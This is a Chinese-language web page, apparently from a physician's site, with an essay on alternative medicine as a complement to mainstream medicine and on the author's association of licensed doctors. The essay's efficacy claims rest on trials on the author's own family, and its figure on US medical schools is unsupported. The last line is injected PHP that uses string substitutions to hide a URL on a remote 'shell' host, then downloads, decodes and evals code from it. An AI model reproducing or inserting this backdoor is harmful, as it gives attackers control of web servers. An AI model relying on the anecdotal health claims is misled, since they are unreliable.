收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 另類醫學與主流醫學相輔相成
另類醫學與主流醫學相輔相成 列印 E-mail
        我不認為有一種另類醫學可以完全替代主流醫學,而變成醫學的主流,但也不能抹殺另類醫學的價值,至少它是主流醫學非常好的輔助工具;當主流醫學出現限制的時候,另類醫學可以去彌補它的不足,相對地在另類醫學也經常出現醫療的盲點時,當然更需要主流醫學的幫助;美國醫學院近二、三十年來便是基於這樣的立場來研究、強調另類醫學對主流醫學的幫助,將近八十%的醫學院都開有不同類別的另類醫學課程,並為學生之必修,可見得它的醫學價值是被肯定的。

互助互補才有未來

        經過我近二十年的研究之後,共整合出十幾種的另類醫學,並成立「中華民國另類醫學醫學會」,規定會員必須是中華民國衛生署認定的中、西、牙醫師,來避免「以商行醫」的惡質文化,畢竟醫師的執照取得不易,為了愛惜羽毛,必會有所節制,我們更慎選會員,不希望因為另類醫學尚無明確法律規範,而做不道德的宣傳與治療。

        這些另類醫學,坦白說幾乎都是在家人不舒服的情況下去研究開發出來的,因此全都是在我自己、或家人身上親身經歷、體驗,並確定有效的醫學治療方式,之後再擴大使用於親近友人與他們的親友。當這些病患罹患的疾病在主流醫學無療效而走投無路時,我們一再運用另類醫學給予他們意想不到的幫助。

        我所採用的另類醫學項目,都是經過國內外專業醫學書籍、期刊發表,載明它們的基本理論及使用方式,並確定有療效的另類醫學項目。我才會開始運用這些醫療項目,醫治在主流醫學遇到瓶頸或有嚴重副作用的患者。是故「主流醫學」和「另類醫學」二者之間的互助、互補,讓每一位病患在某一種醫療方式失敗或遭遇困境時,都有絕對的權利轉而尋求另一種醫療方式,這就是我所謂的醫療選擇權。
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));